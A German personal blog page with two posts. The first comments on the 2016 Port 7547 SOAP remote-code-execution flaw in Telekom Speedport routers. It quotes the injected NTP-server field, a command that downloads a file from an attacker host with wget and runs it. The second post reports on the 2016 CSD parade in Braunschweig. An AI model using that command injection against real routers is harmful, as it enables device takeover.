Speedportrouter der DTAG von Sicherheitsloch betroffen

Jetzt ist es endlich final, die DSL-Speedportrouter der Deutschen Telekom haben ein Sicherheitsloch auf Port 7547 :

https://isc.sans.edu/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759

und ein echt dreckiges dazu, weil die Kisten a) auf jeden Zugriff reagieren und b) eine Remote-Execution möglich ist. Der Hack funktioniert so:

<NewNTPServer1>
`cd /tmp;wget http://angreiferszum nachladen von code/1>;chmod 777 1;./1`
</NewNTPServer1>
<NewNTPServer2></NewNTPServer2>
<NewNTPServer3></NewNTPServer3>
<NewNTPServer4></NewNTPServer4>
<NewNTPServer5></NewNTPServer5>

Natürlich gehört zu dem Request noch mehr, aber das sind die Grundlagen und aus dem Kontext kann man ersehen, daß hier einfach ein parameter aus dem Web genommen wird und an die Bash weitergereicht wird ohne den Inhalt auf Konsistenz zu prüfen. Ein einfacher Test, ob da ein Domainname/IP drinsteht, hätte das bundesweite Chaos vom Wochenende verhindert.

Die DSL-Router wurden Ihnen „proudly presented by Zyxel“ !!! Amis 😉

 

CSD 2016 in Braunschweig

Am Samstag war es wieder soweit, der jährliche Umzug zum CSD Braunschweig hatte stattgefunden. Im Gegensatz zu früheren Jahren waren heute weniger Wagen im Einsatz, dafür aber mehr „Fußvolk“. Auffallend war auch der hohe Anteil an Jugendlichen ( sagen wir mal bis 25 ) , wo in früheren Jahren deutlich mehr Menschen mittleren Alters dabei waren.
CSD Braunschweig 2016

CSD Braunschweig 2016

20160730_142409Den Abschluß des Zuges bildete mal wieder die Piraten Partei, die wie fast immer, Ihre Anlage nicht unter Kontrolle gehabt hat. War es im ersten Jahr noch ein Lautsprecher mit Batterie, der total übersteuert war, versagte die Anlage dies Jahr gleich völlig um dann in einer explosionsgleichen Lautstärke die Fußgänger an der kleinen Burg zu verschrecken 🙂

Ehrlich Jungs & Mädels, bekommt das ENDLICH in den Griff 😀

20160730_142441Und wer darf natürlich dabei nicht fehlen ? 😀 Genau, Tatjana als Maskottchen war auch wieder dabei :

Zum Glück muß man Queen mit den Stöckeln nicht auch noch laufen müssen 😉

Zum Abschluß des Sommerlochfestivals gab es natürlich eine Kundgebung auf dem Schlossplatz.  Allerdings völlig fehl am Platz wirkte dort der Stand der SPD. K.A. was die da wollten, das muß irgendeine Art Mutprobe gewesen sein. Anders macht das keinen Sinn.